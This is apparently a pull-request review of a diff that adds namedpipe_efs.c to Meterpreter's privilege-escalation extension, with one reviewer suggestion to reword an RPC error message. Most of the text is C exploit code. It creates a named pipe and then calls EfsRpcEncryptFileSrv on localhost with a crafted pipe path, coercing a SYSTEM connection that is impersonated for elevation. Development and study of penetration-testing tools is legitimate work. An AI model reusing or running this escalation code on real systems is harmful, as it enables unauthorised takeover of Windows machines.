c/meterpreter/source/extensions/priv/namedpipe_efs.c

```diff
@@ -0,0 +1,193 @@
+		if (!pThread) {
+			BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_efs: met_api->thread.create failed",
+				ERROR_INVALID_HANDLE);
+		}
+
+		if (!met_api->thread.run(pThread)) {
+			BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_efs: met_api->thread.run failed",
+				ERROR_ACCESS_DENIED);
+		}
+
+		// wait for the thread to create the pipe, if it times out terminate
+		if (hSem) {
+			if (WaitForSingleObject(hSem, 500) != WAIT_OBJECT_0) {
+				BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_efs: WaitForSingleObject failed",
+					ERROR_ACCESS_DENIED);
+			}
+		}
+		else {
+			Sleep(500);
+		}
+
+		trigger_efs_connection(cPipeName2);
+
+		// signal our thread to terminate if it is still running
+		met_api->thread.sigterm(pThread);
+
+		// and wait for it to terminate...
+		met_api->thread.join(pThread);
+
+		// get the exit code for our pthread
+		dprintf("[ELEVATE] dwResult before exit code: %u", dwResult);
+		if (!GetExitCodeThread(pThread->handle, &dwResult)) {
+			BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_efs: GetExitCodeThread failed",
+				ERROR_INVALID_HANDLE);
+		}
+		dprintf("[ELEVATE] dwResult after exit code: %u", dwResult);
+
+	} while (0);
+
+	if (pThread) {
+		met_api->thread.destroy(pThread);
+	}
+	if (hSem) {
+		CloseHandle(hSem);
+	}
+
+	return dwResult;
+}
+
+DWORD WINAPI trigger_efs_connection(LPWSTR pPipeName)
+{
+	DWORD hr = 0;
+	LPWSTR pCaptureServer = NULL;
+	handle_t ht = INVALID_HANDLE_VALUE;
+	DWORD dwResult = ERROR_SUCCESS;
+
+	do {
+		pCaptureServer = (LPWSTR)malloc(MAX_PATH * sizeof(WCHAR));
+		if (!pCaptureServer) {
+			BREAK_WITH_ERROR("[ELEVATE] trigger_efs_connection: Out of Memory", STATUS_NO_MEMORY);
+		}
+
+		_snwprintf_s(pCaptureServer, MAX_PATH, _TRUNCATE, (LPWSTR)(L"\\\\localhost/pipe/%s/\\%s\\%s"), pPipeName, pPipeName, pPipeName);
+
+		RpcTryExcept
+			ht = efs_bind(L"localhost");
+			if (ht == INVALID_HANDLE_VALUE) {
+				BREAK_WITH_ERROR("[ELEVATE] trigger_efs_connection: Bind error", ERROR_INVALID_HANDLE);
+			}
+			hr = EfsRpcEncryptFileSrv(ht, pCaptureServer);
+		RpcExcept(EXCEPTION_EXECUTE_HANDLER)
+			BREAK_WITH_ERROR("[ELEVATE] trigger_efs_connection: RPC Error", RpcExceptionCode());
+		RpcEndExcept
+
+		if (hr == ERROR_BAD_NETPATH) {
+			dprintf("[ELEVATE] trigger_efs_connection: Success");
+		} else {
+			dprintf("[ELEVATE] trigger_efs_connection: Did not receive expected output. Attack might have failed.");
+		}
+
+	} while (0);
+
+	if (ht != INVALID_HANDLE_VALUE) {
+		RpcBindingFree(ht);
+	}
+
+	if (pCaptureServer) {
+		free(pCaptureServer);
+	}
+
+	return dwResult;
+}
+
+#define CHECK_RPC_STATUS_AND_RETURN(func, st) {\
+	if (RpcStatus != RPC_S_OK) {\
+		if (DceErrorInqTextA(RpcStatus, RpcError) == RPC_S_OK) {\
+			dprintf("[ELEVATE] efs_bind - Error in %s: 0x%08x - %s", func, RpcStatus, RpcError);\
+		} else {\
+			dprintf("[ELEVATE] efs_bind - Error in %s: 0x%08x", func, RpcStatus);\
+		}\
+		return INVALID_HANDLE_VALUE;\
+	}\
+}
```

Comment:
This is the other spot where it'd be helpful to be clear that the status number is an RPC status number.

```suggestion
#define CHECK_RPC_STATUS_AND_RETURN(func, st) {\
	if (RpcStatus != RPC_S_OK) {\
		if (DceErrorInqTextA(RpcStatus, RpcError) == RPC_S_OK) {\
			dprintf("[ELEVATE] efs_bind - RPC error in %s: 0x%08x - %s", func, RpcStatus, RpcError);\
		} else {\
			dprintf("[ELEVATE] efs_bind - RPC error in %s: 0x%08x", func, RpcStatus);\
		}\
		return INVALID_HANDLE_VALUE;\
	}\
}
```